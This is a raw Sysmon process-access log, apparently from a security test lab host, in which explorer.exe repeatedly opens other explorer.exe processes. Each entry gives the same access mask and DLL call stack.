16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002244937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 